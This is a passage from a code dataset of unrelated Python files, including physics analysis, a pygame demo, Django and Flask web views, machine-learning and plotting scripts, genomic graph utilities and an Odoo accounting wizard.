\"mcReco_matching && method_jets01 && isrMC_pt>0\"\nmcReco_matching = \"1\"\n\nhistos = []\n\nROOT.gStyle.SetOptStat(0)\nROOT.gROOT.SetBatch(1)\ncanv = ROOT.TCanvas(\"canv\",\"\",1280,720)\ncanv.SetGridx()\ncanv.SetGridy()\n#canv.SetLogy()\n\n\nfileNameBkg = \"../ntupleTrigger/CaloJet40Skim.root\"\n\nfileNames = [\n# \"../output/test_reduced_skim_new.root\",\n# \"../CaloScoutingHT250.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_25_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_50_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_75_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_100_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_125_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_150_13TeV.root\",\n 
#\"../ntupleSignal/VectorDiJet1Jet_200_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_300_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_400_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_500_13TeV.root\",\n \"../ntupleSignal/VectorDiJet1Jet_600_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_800_13TeV.root\",\n #\"../ntupleSignal/VectorDiJet1Jet_1000_13TeV.root\",\n]\n\nimport copy\nsignals = {}\nmaxim = 0\nfileBkg = ROOT.TFile(fileNameBkg)\ntreeBkg = fileBkg.Get(\"rootTupleTree/tree\")\n\nfor preselection in preselections:\n print(preselection)\n for fileName in fileNames:\n #print(\"Opening %s\"%(fileName))\n mass = fileName.split(\"VectorDiJet1Jet_\")[1]\n mass = mass.split(\"_\")[0]\n file_ = ROOT.TFile(fileName)\n tree = file_.Get(\"rootTupleTree/tree\")\n if type(tree) != ROOT.TTree: \n print(\"WARNING: skipping %s\"%fileName)\n continue\n m = int(mass)\n m_low = m*k_low \n m_up = m*k_up \n print(m_low,m_up)\n sel = preselection + \"&& (dijet_mass>%d) && (dijet_mass<%d)\"%(m_low, m_up)\n signal = tree.Draw(\"\", sel+\"&&\"+ mcReco_matching)\n bkg = treeBkg.Draw(\"\", sel)\n print(preselection)\n print(\"mass = %s ; S/sqrt(B) = %f ; S/B = %f; S = %d; B = %d\"%(mass, (1.*signal/bkg**0.5/14.143060), (1.*signal/bkg), signal, bkg))\n file_.Close()\n\n","sub_path":"silvio/oldCode/Sensitivity.py","file_name":"Sensitivity.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"215017306","text":"import pygame\n\npygame.init()\nOX = 600\nOY = 600\nwin = pygame.display.set_mode((OX, OY))\n\npygame.display.set_caption(\"COMPUTER TRAINING CENTER GAME\")\n\nx = 10\nwidth = 30\nheight = 30\nspeed = 25\ny = OY - speed - height\n\n\nisJump = False\njumpCount = 10\nleft = False\nright = False\nanimcount = 0\n\nrun = True\nwhile run:\n pygame.time.delay(50)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and x > speed:\n x -= speed\n elif keys[pygame.K_RIGHT] and x < OX - speed - width:\n x += speed\n if not(isJump):\n if keys[pygame.K_SPACE]:\n isJump = True\n else:\n if jumpCount >= -10:\n if jumpCount < 0:\n y += (jumpCount ** 2)/2\n else:\n y -= (jumpCount ** 2)/2\n jumpCount -= 1\n else:\n isJump = False\n jumpCount = 10\n\n\n win.fill((0,0,0))\n pygame.draw.rect(win, (0 , 0, 255), (x, y , width, height))\n pygame.display.update()\n\npygame.quit()\n","sub_path":"pygamee/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"162467804","text":"import requests\nfrom django.conf import settings\nfrom rest_framework.decorators import api_view\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.response import Response\nfrom .fields import game_fields, search_fields, popular_fields, backdrop_fields\nfrom .models import Game\n\n\n@api_view(['GET'])\ndef get_game(request, slug):\n \"\"\"Get a game from IGDB.\n\n Makes a call to the `https://api-v3.igdb.com/games` endpoint, specifying the\n fields (defined as `game_fields` in fields.py) and game ID in the POST data.\n \n For more details read https://api-docs.igdb.com/?javascript#game.\n\n Args:\n slug: unique name of the game e.g. 
dark-souls, prey, prey--1.\n\n Returns:\n game: a JSON response containing the details of a game.\n \"\"\"\n data = f'fields {game_fields}; where slug=\"{slug}\";'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers).json()\n\n if not r:\n raise NotFound(detail='Game not found.')\n\n return Response(r)\n\n\n@api_view(['GET'])\ndef search_game(request, name):\n \"\"\"Search a game based on a name.\n \n Calls `https://api-v3.igdb.com/games` specifying the search term in the\n POST data. The search term must be a string, the name of the game. The\n fields shown in the results are defined in `search_fields` from fields.py.\n \n For more details on how to search the IGDB API, read \n https://api-docs.igdb.com/?javascript#search-176.\n\n Args:\n name: the search term, name of the desired game.\n\n Returns:\n games: a JSON containing a list of search results.\n \"\"\"\n data = f'fields {search_fields}; search \"{name}\";'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_popular_games(request):\n \"\"\"Gets popular or trending games.\n \n Calls the `games` endpoint, sorting the results by popularity (desc).\n This endpoint is called in Overworld's landing page. An example of this\n is documented on IGDB https://api-docs.igdb.com/?javascript#examples-12. \n\n Returns:\n games: six games sorted by popularity.\n \"\"\"\n data = f'fields {popular_fields}; sort popularity desc; limit 6;'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_backdrop(request, guid):\n \"\"\"Gets the background image for the landing page.\n \n Makes a call to `https://api-v3.igdb.com/games`, with image-related fields\n only. The game the backdrop is selected from is randomly selected in the \n frontend.\n\n Args:\n guid: ID of the game.\n\n Returns:\n backdrop: a JSON object with the image IDs necessary for the backdrop.\n \"\"\"\n data = f'fields {backdrop_fields}; where id={guid};'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n","sub_path":"backend/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346682975","text":"#! 
/usr/bin/env python3\n\n# implement SVM classification on scikit wine dataset\n\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\nimport sklearn.metrics as metrics\n\nwine = datasets.load_wine()\n\n# wine set has 3 classes of wine\n\n#print(wine.target_names)\n#print(wine.feature_names)\n\n# split into train and test sets, use 80% of data to train and 20% to test\nx_train, x_test, y_train, y_test = train_test_split(wine.data, wine.target, test_size=0.2)\n\n# make an SVM classifier using a linear kernel\nclassifier = svm.SVC(kernel='linear', )\n\n# fit model to our training data and make predictions on test set\nclassifier.fit(x_train, y_train)\npred = classifier.predict(x_test)\n\n# print classification report and accuracy of predictions\nprint('--- linear kernel results ---')\nprint(metrics.classification_report(y_test, pred))\nprint('accuracy:', metrics.accuracy_score(y_test, pred))\n\n# repeat using RBF kernel\nclassifier = svm.SVC(kernel='rbf', )\nclassifier.fit(x_train, y_train)\npred = classifier.predict(x_test)\n\nprint('--- RBF kernel results ---')\nprint(metrics.classification_report(y_test, pred))\nprint('accuracy', metrics.accuracy_score(y_test, pred))\n\n\n#plt.xlabel('Annual Income')\n#plt.ylabel('Spending Score')\n","sub_path":"source/lab3/lab_3_3.py","file_name":"lab_3_3.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"377344319","text":"import os\nimport requests\nimport json\nimport base64\nfrom flask import abort, Flask, jsonify, request\nfrom rq import Queue\nfrom oooWorker import conn\n\n\napp = Flask(__name__)\n\ndef IsRequestValid(request):\n isTokenValid = request.form['token'] == os.environ.get('VALID_TOKEN')\n isTeamIdValid = request.form['team_id'] == os.environ.get('TEAM_ID')\n\n return isTokenValid and isTeamIdValid\n\ndef GetChanellHistory(responseUrl, userId):\n oooHistoryString = \"\"\n BOT_TOKKEN = os.environ.get('BOT_TOKEN')\n OOO_CHANNEL_ID = os.environ.get('OOO_CHANNEL_ID')\n\n payload = {\"token\": BOT_TOKKEN, \"channel\": OOO_CHANNEL_ID}\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n \n while True:\n response = requests.get('https://slack.com/api/conversations.history', params=payload, headers=headers)\n allDict = json.loads(response.text)\n \n for messageItem in allDict[\"messages\"]:\n if \"user\" in messageItem and messageItem[\"user\"] == userId:\n if \"thread_ts\" in messageItem:\n threadPayload = {\"token\": BOT_TOKKEN, \"channel\": OOO_CHANNEL_ID, \"ts\": messageItem[\"thread_ts\"]}\n threadResponse = requests.get('https://slack.com/api/conversations.replies', params=threadPayload, headers=headers)\n threadDict = json.loads(threadResponse.text)\n\n for threadItem in threadDict[\"messages\"]:\n if \"user\" in threadItem and threadItem[\"user\"] == userId:\n oooHistoryString = PrintItem(threadItem, oooHistoryString)\n\n else:\n oooHistoryString = PrintItem(messageItem, oooHistoryString)\n \n if allDict[\"has_more\"] == True:\n payload['cursor'] = allDict[\"response_metadata\"][\"next_cursor\"] \n else:\n break\n\n attachmentsDict = {}\n attachmentsDict['title'] = \"Here comes your OoO history.\"\n attachmentsDict['text'] = oooHistoryString\n\n SendMessageToSlack(attachmentsDict, responseUrl) \n \ndef PrintItem(messageItem, oooHistoryString):\n oooHistoryString += messageItem['text']\n oooHistoryString += \"\\n\\n\" \n return oooHistoryString\n\ndef 
SendMessageToSlack(attachment, url):\n payload = {}\n payload['text'] = 'Get OoO History'\n payload['attachments'] = []\n payload['attachments'].append(attachment)\n payload['response_type'] = 'ephemeral'\n\n payloadResult = json.dumps(payload)\n headers = {'Content-type': 'application/json', 'charset': 'UTF-8'}\n\n result = requests.post(url, data=payloadResult, headers=headers)\n print(result.text)\n\ndef QueingJob(request):\n print (\"QueingJob\")\n q = Queue(connection=conn)\n result = q.enqueue(GetChanellHistory, request.form['response_url'], request.form['user_id'])\n print(result)\n\n@app.route('/', methods=['POST'])\ndef OOOMe():\n if not IsRequestValid(request):\n abort(400)\n \n print (\"OOOME\")\n # GetChanellHistory(request.form['response_url'], request.form['user_id'])\n QueingJob(request)\n\n return jsonify(response_type='ephemeral', text=\"Check %s's ooo history:fast_parrot:\" % request.form['user_name']) \n\n# ooo channel id C4DRJAA0Y\n","sub_path":"oooChecker.py","file_name":"oooChecker.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"145861605","text":"#!/usr/bin/env python3 -W ignore\nfrom pandas import DataFrame, read_csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport argparse\nimport sys\n## Define the default values\nparser = argparse.ArgumentParser()\nparser.add_argument('-csv' , action='store',dest='csvfile',help='path to csvfile first column x axis',type=str)\nparser.add_argument('-xlabel', action='store',dest='xlabel' ,help='label for the x axis',type=str)\nparser.add_argument('-ylabel', action='store',dest='ylabel' ,help='label for the y axis',type=str)\nparser.add_argument('-output', action='store',dest='output' ,help='name of the output file',type=str)\nparser.add_argument('-title', action='store' ,dest='title' ,help='title of the plot',type=str)\nresults = parser.parse_args()\n\nif not (results.csvfile): sys.exit(\"Error:csv file not defined\")\nif not (results.output): results.output = \"mylineplot\"\nif not (results.title): results.title = \"mytitle\"\nfile = open(results.csvfile,'r')\ndf = pd.read_csv(file)\n\n## Testing stuff\n#print(df)\n#print('Max', df['3x'].max())\n#print('Min', df['2x'].min())\n\nX = list(df)\nmyplot=df.plot(X[0],X[1:])\nmyplot.set_xlabel(results.xlabel)\nmyplot.set_ylabel(results.ylabel)\nplt.title(results.title)\nplt.savefig(results.output)\n","sub_path":"python/mylineplot.py","file_name":"mylineplot.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"553444158","text":"import json\n\nimport pandas as pd\nimport plotly\nimport plotly.graph_objs as go\n\n\ndef create_barchart_sourceVeracite():\n\n pd.set_option('display.max_colwidth', -1)\n pd.set_option('display.max_columns', None)\n\n ##########################load df\n df_Source_labelTRUE = pd.read_csv('modules/df_Source_labelTRUE.csv', dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n df_Source_labelFALSE = pd.read_csv('modules/df_Source_labelFALSE.csv',dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n df_Source_labelOTHER = pd.read_csv('modules/df_Source_labelOTHER.csv',dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n df_Source_labelMIXTURE = pd.read_csv('modules/df_Source_labelMIXTURE.csv',dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n\n 
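# hypothetical guard, not in the original module: the per-source counts below assume a 'source' column in every frame\n for df_ in (df_Source_labelTRUE, df_Source_labelFALSE, df_Source_labelOTHER, df_Source_labelMIXTURE):\n assert 'source' in df_.columns, 'expected a source column'\n\n 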
df_Source_labelTRUE_Distinct=list(set(df_Source_labelTRUE[\"source\"]))\n df_Source_labelFALSE_Distinct = list(set(df_Source_labelFALSE[\"source\"]))\n df_Source_labelOTHER_Distinct = list(set(df_Source_labelOTHER[\"source\"]))\n df_Source_labelMIXTURE_Distinct = list(set(df_Source_labelMIXTURE[\"source\"]))\n\n dic={}\n for auteur in df_Source_labelOTHER_Distinct:\n A = list(df_Source_labelTRUE['source']).count(auteur)\n B = list(df_Source_labelFALSE['source']).count(auteur)\n C = list(df_Source_labelOTHER['source']).count(auteur)\n D = list(df_Source_labelMIXTURE['source']).count(auteur)\n dic[auteur]=[A,B,C,D]\n\n labels = ['TRUE', 'FALSE', 'OTHER', 'MIXTURE']\n\n colors = ['blue', 'lightskyblue','red','yellow','green','black']\n\n\n data=[]\n i=0\n for key in dic.keys():\n trace0 = go.Bar(\n x=labels,\n y=dic[key],\n name=key,\n marker=dict(color=colors[i % len(colors)]))\n data.append(trace0)\n i=i+1\n\n\n layout = go.Layout(\n title='Means of item by claims',\n barmode='group'\n )\n\n barchart_nb_means_JSON22 = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n\n\n # print(piechart_labels_JSON)\n return barchart_nb_means_JSON22\n# create_barchart_sourceVeracite()","sub_path":"modules/barchartsSourceVeracite.py","file_name":"barchartsSourceVeracite.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"47564035","text":"\n\n\nimport csv\n\nfrom Functions.Helpers import *\n\n\ndef fromGI(G, file, colorPalette):\n \"\"\"\n fromGI() function takes a converted (please check the format) GI object and initializes a networkx graph.\n\n - Requires an empty nx graph object, a converted file location and a color palette (see formats)\n - Returns the number of nodes in each node class.\n\n \"\"\"\n\n nodeClassC = {}\n with open(file) as tsvfile:\n reader = csv.reader(tsvfile, delimiter='\\t')\n for row in reader:\n abNode = row[0]\n\n aNode = abNode.split(\",\")[0]\n aNodeClass = aNode.split(\".\")[0]\n aNode = aNode.split(\".\",maxsplit=1)[1]\n\n bNode = abNode.split(\",\")[1]\n bNodeClass = bNode.split(\".\")[0]\n bNode = bNode.split(\".\",maxsplit=1)[1]\n\n weight = row[1]\n fdr = row[2]\n\n weight = int(weight)\n fdr = float(fdr)\n\n G.add_node(aNode,\n color=colorPalette[aNodeClass],\n nodeClass=aNodeClass,\n logFC=0,\n Qval=0,\n nodeRange=(),\n index=0,\n nodeName=aNode,\n elm=[],\n tad=[],\n com=[],\n chr=[],\n subP=None,\n subE=None,\n subG=None,\n subT=None,\n subM=None)\n G.add_node(bNode,\n color=colorPalette[bNodeClass],\n nodeClass=bNodeClass,\n logFC=0,\n Qval=0,\n nodeRange=(),\n index=0,\n nodeName=bNode,\n elm=[],\n tad=[],\n com=[],\n chr=[],\n subP=None,\n subE=None, # Classical enhancer promoter\n subG=None, # CRE => should have two first degree subGraph\n subT=None,\n subM=None)\n\n if (aNode, bNode) in G.edges:\n w2 = G.edges[(aNode, bNode)][\"weight\"]\n weight += w2\n G.edges[(aNode, bNode)][\"weight\"] = weight\n\n else:\n G.add_edge(aNode, bNode,\n weight=weight,\n fdr=fdr,\n edgeType={(aNodeClass, bNodeClass) : 0},\n color=\"#888888\",\n distance=\"\")\n\n\n # count both endpoint classes for every row\n if not aNodeClass in nodeClassC.keys():\n nodeClassC[aNodeClass] = 0\n if not bNodeClass in nodeClassC.keys():\n nodeClassC[bNodeClass] = 0\n nodeClassC[aNodeClass] += 1\n nodeClassC[bNodeClass] += 1\n\n return nodeClassC\n\n\n\ndef fromGIup(L, U, upLvl=\"tad\",lwLvl=\"subG\"):\n \"\"\"\n This function connects different levels of graphs with a given combination of upper level 
and lower level.\n\n - Levels are G -> T -> M -> C, based on genomic organization.\n - Each level is represented by a graph object, and its nodes are DNA regions in the genome.\n\n - While going up in the system, corresponding subGraphs are integrated into one upper level.\n - At the same time, current lower-level nodes get an attribute recording their positions in the upper levels.\n\n - For a fully connected system, please run this code as follows:\n [0]: fromGIup(G, T, \"tad\", \"subG\")\n [1]: fromGIup(G, M, \"com\", \"subG\")\n [2]: fromGIup(G, C, \"chr\", \"subG\")\n\n [3]: fromGIup(T, M, \"com\", \"subT\")\n [4]: fromGIup(T, C, \"chr\", \"subT\")\n\n [5]: fromGIup(M, C, \"chr\", \"subM\")\n - Note that each upper level in the system should first get the lowest subGraph attribute; then the system can be built.\n\n \"\"\"\n\n Lbed = dict(L.nodes(data=\"nodeRange\"))\n\n Lbed = sortBed(Lbed)\n\n Ubed = dict(U.nodes(data=\"nodeRange\"))\n\n Ubed = sortBed(Ubed)\n\n Unodes = list(U.nodes())\n\n for node in Unodes:\n\n nodeRange = Ubed[node]\n nodeClass = U.nodes[node][\"nodeClass\"]\n\n nUp = rangesFromUpperRange(nodeRange[0], nodeRange[1], nodeRange[2], Lbed)\n\n n = [_[0] for _ in nUp]\n\n if len(n) == 0:\n U.remove_node(node)\n continue\n\n\n for nodeL in n:\n L.nodes[nodeL][upLvl] = node\n\n U.nodes[node][upLvl] = node\n\n l = L.subgraph(n).copy()\n\n U.nodes[node][lwLvl] = l\n","sub_path":"MainFunctions/GIFunctions.py","file_name":"GIFunctions.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"245838991","text":"# -*- coding: utf-8 -*-\n#\n#\n# Copyright (C) 2012 Agile Business Group sagl ()\n# Copyright (C) 2012 Domsense srl ()\n# Copyright (C) 2012 Associazione OpenERP Italia\n# ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n#\n\nfrom openerp.osv import fields, orm\nfrom tools.translate import _\nimport netsvc\n\n\nclass riba_unsolved(orm.TransientModel):\n\n def _get_unsolved_journal_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'unsolved_journal_id', context=context)\n\n def _get_effects_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'acceptance_account_id', context=context)\n\n def _get_effects_amount(self, cr, uid, context=None):\n if context is None:\n context = {}\n if not context.get('active_id', False):\n return False\n return self.pool.get(\n 'riba.distinta.line'\n ).browse(cr, uid, context['active_id'], context=context).amount\n\n def _get_riba_bank_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'accreditation_account_id', context=context)\n\n def _get_overdue_effects_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'overdue_effects_account_id', context=context)\n\n def _get_bank_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'bank_account_id', context=context)\n\n def _get_bank_expense_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'protest_charge_account_id', context=context)\n\n _name = \"riba.unsolved\"\n _columns = {\n 'unsolved_journal_id': fields.many2one(\n 'account.journal', \"Unsolved journal\",\n domain=[('type', '=', 'bank')]),\n 'effects_account_id': fields.many2one(\n 'account.account', \"Effects account\",\n domain=[('type', '=', 'receivable')]),\n 'effects_amount': fields.float('Effects amount'),\n 'riba_bank_account_id': fields.many2one(\n 'account.account', \"Ri.Ba. bank account\"),\n 'riba_bank_amount': fields.float('Ri.Ba. 
bank amount'),\n 'overdue_effects_account_id': fields.many2one(\n 'account.account', \"Overdue Effects account\",\n domain=[('type', '=', 'receivable')]),\n 'overdue_effects_amount': fields.float('Overdue Effects amount'),\n 'bank_account_id': fields.many2one('account.account', \"Bank account\",\n domain=[(\n 'type', '=', 'liquidity')]),\n 'bank_amount': fields.float('Taken amount'),\n 'bank_expense_account_id': fields.many2one(\n 'account.account', \"Bank Expenses account\"),\n 'expense_amount': fields.float('Expenses amount'),\n }\n\n _defaults = {\n 'unsolved_journal_id': _get_unsolved_journal_id,\n 'effects_account_id': _get_effects_account_id,\n 'effects_amount': _get_effects_amount,\n 'riba_bank_account_id': _get_riba_bank_account_id,\n 'riba_bank_amount': _get_effects_amount,\n 'overdue_effects_account_id': _get_overdue_effects_account_id,\n 'overdue_effects_amount': _get_effects_amount,\n 'bank_account_id': _get_bank_account_id,\n 'bank_expense_account_id': _get_bank_expense_account_id,\n }\n\n def skip(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n wf_service = netsvc.LocalService(\"workflow\")\n active_id = context and context.get('active_id', False) or False\n if not active_id:\n raise orm.except_orm(_('Error'), _('No active ID found'))\n line_pool = self.pool.get('riba.distinta.line')\n line_pool.write(cr, uid, active_id,\n {'state': 'unsolved'}, context=context)\n wf_service.trg_validate(\n uid, 'riba.distinta', line_pool.browse(\n cr, uid, active_id).distinta_id.id, 'unsolved', cr)\n return {'type': 'ir.actions.act_window_close'}\n\n def create_move(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n wf_service = netsvc.LocalService(\"workflow\")\n active_id = context and context.get('active_id', False) or False\n if not active_id:\n raise orm.except_orm(_('Error'), _('No active ID found'))\n move_pool = self.pool.get('account.move')\n invoice_pool = self.pool.get('account.invoice')\n move_line_pool = self.pool.get('account.move.line')\n distinta_line = self.pool.get('riba.distinta.line').browse(\n cr, uid, active_id, context=context)\n wizard = self.browse(cr, uid, ids)[0]\n if (\n not wizard.unsolved_journal_id\n or not wizard.effects_account_id\n or not wizard.riba_bank_account_id\n or not wizard.overdue_effects_account_id\n or not wizard.bank_account_id\n or not wizard.bank_expense_account_id\n ):\n raise orm.except_orm(_('Error'), _('Every account is mandatory'))\n move_vals = {\n 'ref': _('Unsolved Ri.Ba. %s - line %s') % (\n distinta_line.distinta_id.name, distinta_line.sequence),\n 'journal_id': wizard.unsolved_journal_id.id,\n 'line_id': [\n (0, 0, {\n 'name': _('Effects'),\n 'account_id': wizard.effects_account_id.id,\n 'partner_id': distinta_line.partner_id.id,\n 'credit': wizard.effects_amount,\n 'debit': 0.0,\n }),\n (0, 0, {\n 'name': _('Ri.Ba. 
Bank'),\n 'account_id': wizard.riba_bank_account_id.id,\n 'debit': wizard.riba_bank_amount,\n 'credit': 0.0,\n }),\n (0, 0, {\n 'name': _('Overdue Effects'),\n 'account_id': wizard.overdue_effects_account_id.id,\n 'debit': wizard.overdue_effects_amount,\n 'credit': 0.0,\n 'partner_id': distinta_line.partner_id.id,\n 'date_maturity': distinta_line.due_date,\n }),\n (0, 0, {\n 'name': _('Bank'),\n 'account_id': wizard.bank_account_id.id,\n 'credit': wizard.bank_amount,\n 'debit': 0.0,\n }),\n (0, 0, {\n 'name': _('Expenses'),\n 'account_id': wizard.bank_expense_account_id.id,\n 'debit': wizard.expense_amount,\n 'credit': 0.0,\n }),\n ]\n }\n move_id = move_pool.create(cr, uid, move_vals, context=context)\n\n to_be_reconciled = []\n for move_line in move_pool.browse(\n cr, uid, move_id, context=context\n ).line_id:\n if move_line.account_id.id == wizard.overdue_effects_account_id.id:\n for riba_move_line in distinta_line.move_line_ids:\n invoice_ids = []\n if riba_move_line.move_line_id.invoice:\n invoice_ids = [riba_move_line.move_line_id.invoice.id]\n elif riba_move_line.move_line_id.unsolved_invoice_ids:\n invoice_ids = [\n i.id for i in\n riba_move_line.move_line_id.unsolved_invoice_ids\n ]\n invoice_pool.write(cr, uid, invoice_ids, {\n 'unsolved_move_line_ids': [(4, move_line.id)],\n }, context=context)\n if move_line.account_id.id == wizard.effects_account_id.id:\n to_be_reconciled.append(move_line.id)\n for acceptance_move_line in distinta_line.acceptance_move_id.line_id:\n if (\n acceptance_move_line.account_id.id\n == wizard.effects_account_id.id\n ):\n to_be_reconciled.append(acceptance_move_line.id)\n\n distinta_line.write({\n 'unsolved_move_id': move_id,\n 'state': 'unsolved',\n })\n move_line_pool.reconcile_partial(\n cr, uid, to_be_reconciled, context=context)\n wf_service.trg_validate(\n uid, 'riba.distinta', distinta_line.distinta_id.id, 'unsolved', cr)\n return {\n 'name': _('Unsolved Entry'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'account.move',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'res_id': move_id or False,\n }\n","sub_path":"l10n_it_ricevute_bancarie/wizard/wizard_unsolved.py","file_name":"wizard_unsolved.py","file_ext":"py","file_size_in_byte":10000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643795082","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if len(needle) == 0: return 0\n for index in range(0, len(haystack)):\n if (len(needle) + index > len(haystack)): return -1\n indexToReturn = index\n for i in range(0, len(needle)):\n if (haystack[index+i] != needle[i]):\n indexToReturn = -1\n break\n if indexToReturn != -1: return indexToReturn\n return -1\n\ns = Solution()\nassert s.strStr(\"hello\", \"\") == 0, \"Should be 0\"\nassert s.strStr(\"hello\", \"ll\") == 2, \"Should be 2\"\nassert s.strStr(\"aaa\", \"bba\") == -1, \"Should be -1\"\nassert s.strStr(\"\", \"bba\") == -1, \"Should be -1\"\nassert s.strStr(\"aaa\", \"aaaa\") == -1, \"Should be -1\"","sub_path":"src/leet/ImplementStrStrQ28.py","file_name":"ImplementStrStrQ28.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"33555570","text":"from django.urls import path\r\nfrom . 
import views\r\n\r\napp_name = 'st_pauls_school'\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('teacher/', views.Teachers, name = 'teacher'),\r\n path('teacher/dashboard/', views.TeacherDasboard, name = 'teacherdashboard'),\r\n path('student/', views.Students, name = 'student'),\r\n path('student/dashboard/', views.StudentDasboard, name = 'studentdashboard'),\r\n]\r\n\r\n","sub_path":"college_platform/st_pauls_school/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"70634868","text":"# -*- coding: utf-8 -*-\n\n# ██╗███╗ ██╗██╗████████╗██╗ █████╗ ██╗ ██╗███████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗\n# ██║████╗ ██║██║╚══██╔══╝██║██╔══██╗██║ ██║╚══███╔╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║\n# ██║██╔██╗ ██║██║ ██║ ██║███████║██║ ██║ ███╔╝ ███████║ ██║ ██║██║ ██║██╔██╗ ██║\n# ██║██║╚██╗██║██║ ██║ ██║██╔══██║██║ ██║ ███╔╝ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║\n# ██║██║ ╚████║██║ ██║ ██║██║ ██║███████╗██║███████╗██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║\n# ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝\n\n# Description: contains initialization process. Initialization means synchronization from start date\n\n# ======================================================== DEPENDENCIES\n\n# Native:\nimport sys\nfrom datetime import datetime as Datetime\nfrom datetime import date as Date\nimport multiprocessing\n\n# Pauli SDK dependency:\nfrom pauli_sdk.Modules import constants as _Pauli_Constants\nfrom pauli_sdk.Modules import helper as _Pauli_Helper\nfrom pauli_sdk.Classes.response import Error\nfrom pauli_sdk.Classes.response import Already_Handled_Exception\n\n# Development:\nfrom General import constants as _Constants\nfrom General import utilities as 